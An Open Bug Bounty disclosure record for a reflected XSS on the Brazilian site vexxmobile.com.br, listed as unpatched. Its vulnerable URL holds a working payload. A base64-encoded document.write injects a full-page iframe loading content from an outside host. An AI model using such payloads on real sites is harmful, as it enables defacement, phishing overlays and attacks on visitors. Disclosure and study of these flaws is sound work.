vexxmobile.com.br XSS vulnerability

2015-07-08T12:02:00
ID OBB:70598
Type openbugbounty
Reporter sToRm
Modified 2015-07-08T12:04:00

Description

Vulnerable URL:
http://www.vexxmobile.com.br/servicos/servicos.php/1%22%3E%3C/a%3E%3C/div%3E%3Cscript%3Ealert%28%22XSSPOSED%22%29;document.write%28atob%28%27PGlmcmFtZSBzdHlsZT0icG9zaXRpb246Zml4ZWQ7dG9wOjA7bGVmdDowO3dpZHRoOjEwMCU7bWluLWhlaWdodDoxMDAwcHg7aGVpZ2h0OjEwMCU7Ym9yZGVyOm5vbmU7ei1pbmRleDo5OTkiIHNyYz0iaHR0cDovL3d3dy5zaWNoZXJoZWl0LW9ubGluZS5vcmcveHRlcm5hbC9zdG9ybS5odG1sIj48L2lmcmFtZT4=%27%29%29;%3C/script%3E%3C!--
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 25.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 7772532
Google Pagerank| 1
VIP website status:| No
Check vexxmobile.com.br SSL connection:| (Grade: B)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 8 July, 2015 12:02 GMT
Vulnerability existence verified and confirmed| 8 July, 2015 12:04 GMT